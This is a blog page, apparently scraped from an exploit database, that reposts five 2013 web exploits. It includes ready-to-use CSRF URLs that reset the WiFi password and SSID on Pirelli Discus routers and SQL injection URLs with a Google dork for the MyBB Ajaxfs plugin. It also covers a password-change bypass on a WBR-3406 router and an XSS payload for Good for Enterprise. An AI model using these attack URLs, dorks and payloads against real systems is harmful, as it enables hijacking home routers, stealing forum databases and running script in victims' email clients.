You Might Also Like

Showing posts with label Vulnerability. Show all posts
Showing posts with label Vulnerability. Show all posts

Monday, November 25, 2013

[webapps] - Pirelli Discus DRG A125g - Remote Change WiFi Password Vulnerability

ad


# Exploit Title: Pirelli Discus DRG A125g remote change wifi passwordvulnerability


# Hardware: Pirelli Discus DRG A125g


# Date: 2013/11/23# Exploit Author: Sebastián Magof


# Tested on: Linux/Windows


# Twitter: @smagof


# Greetz: Family, friends && under guys.


# Special Greetz:


# (\/)


# (**) alpha


#(")(")


#Exploit:http://10.0.0.2/wladv.wl?wlSsidIdx=0&wlHide=0&wlAuthMode=psk2&wlAuth=0&wlWep=disabled&wlWpaPsk=PASSWORDHERE&wlWpaGtkRekey=0&wlKeyBit=1&wlPreauth=1&wlWpa=tkip#info: where the parameter wlWpaPsk=PASSWORDHERE is where we will enter thepassword we want to put the victim wifi. If the victim clicks on the urlyour modem / router will reboot automatically with the new passwordprovided by the attacker.


View the original article here

Posted by Abonk at 11:18 AM 0 comments
Labels: , , , , , , ,

[webapps] - MyBB Ajaxfs 2 Plugin - SQL Injection Vulnerability

ad

Screenshot

############################ Mybb Ajaxfs Plugin Sql Injection vulnerability############################################################## @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ # @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@###################################### # Exploit Title : Mybb Ajaxfs Plugin Sql Injection vulnerability # Author : Iranian Exploit DataBase # Discovered By : IeDb # Email : [email protected] - [email protected] # Home : http://iedb.ir - http://iedb.ir/acc # Fb Page : https://www.facebook.com/pages/Exploit-And-Security-Team-iedbir/199266860256538 # Software Link : http://mods.mybb.com/download/ajax-forum-stat-v-2 # Security Risk : High # Tested on : Linux # Dork : inurl:ajaxfs.php ################################# 1) if(isset($_GET['tooltip'])) { $pid=$_GET['tooltip']; $query_post = $db->query ("SELECT * FROM ".TABLE_PREFIX."posts WHERE pid='$pid'"); 2) if(isset($_GET['usertooltip'])) { $uid=$_GET['usertooltip']; $query_user = $db->query ("SELECT * FROM ".TABLE_PREFIX."users WHERE uid='$uid'"); http://localhost/Upload/ajaxfs.php?usertooltip=1' 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1 Google DORK : inurl:ajaxfs.php # Exploit : # http://site.com/mybb/ajaxfs.php?tooltip=[sql] # http://site.com/mybb/ajaxfs.php?usertooltip=[sql] ################################# # Tnx To : All Member In Iedb.ir/acc & Iranian Hackers #################################

View the original article here

Posted by Abonk at 10:25 AM 0 comments
Labels: , , , ,

[webapps] - WBR-3406 Wireless Broadband NAT Router Web-Console - Password Change Bypass & CSRF Vulnerability

ad


# -----------------------------------------------------------#


WBR-3406 Wireless Broadband NAT Router Web-Console Password Change Bypass & CSRF Vulnerability


# This PoC code should do two main things:# 1. Cross Site Request Forgery (For more information, just google it).


# 2. This code change to new password without know the current password.


# The vulnerability work in a way that if we remove the "PA=" parameter which is the current password


# the application ignore that and change the password without even entering the old / current password.


# Bug discovered by Pr0T3cT10n AKA Yakir Wizman,


# Date 17/08/2012


# Vendor site - http://www.level1.com/


# ISRAEL# -----------------------------------------------------------


# Author will be not responsible for any damage.# -----------------------------------------------------------


# PoC EXPLOIT


# -----------------------------------------------------------


# -----------------------------------------------------------

View the original article here

Posted by Abonk at 9:55 AM 0 comments
Labels: , , , , , , , , ,

[webapps] - Pirelli Discus DRG A125g - Remote Change SSID Value Vulnerability

ad


# Exploit Title: Pirelli Discus DRG A125g remote change SSID valuevulnerability


# Hardware: Pirelli Discus DRG A125g


# Date: 2013/11/23


# Exploit Author: Sebastián Magof


# Tested on: Linux/Windows


# Twitter: @smagof


# Greetz: Family, friends && under guys.


# Special Greetz:


# (\/)# (**) alpha


#(")(")


#Exploit:http://10.0.0.2/wlbasic.wl?wlSsidIdx=0&wlSsid=bysmagof#info: where the parameter "wlSsid" is where the attacker will enter thenew SSID. If the victim clicks on the url your modem / router will rebootautomatically with the new SSID provided by the attacker.


View the original article here

Posted by Abonk at 7:05 AM 0 comments
Labels: , , , , , , ,

Thursday, September 26, 2013

[webapps] - Good for Enterprise 2.2.2.1611 - XSS Vulnerability

The vulnerable versions are v2.2.2.1611 and earlier Proof of Concept:HTML Email including the following payload will execute Javascript statements when the victim open the email using the vulnerable version. Payload: < script >alert('XSS Here')< / script> Remediation:I worked with the Good people to close the issue, I provided some guidance and feedback and agreed with them to not disclose it until they fix it.The new release is now available:Update the "Good for Enterprise" iOS application to 2.2.4.1659 or newer References:https://www.roblest.com/#research:CVE-2013-5118 Can the comunity please provide feedback and comments in order to ensure the fix is working wellMany thanksMario
View the original article here
Posted by Penulis at 6:55 AM 0 comments
Labels: , , ,
Subscribe to: Posts (Atom)

Advertisements

Advertisements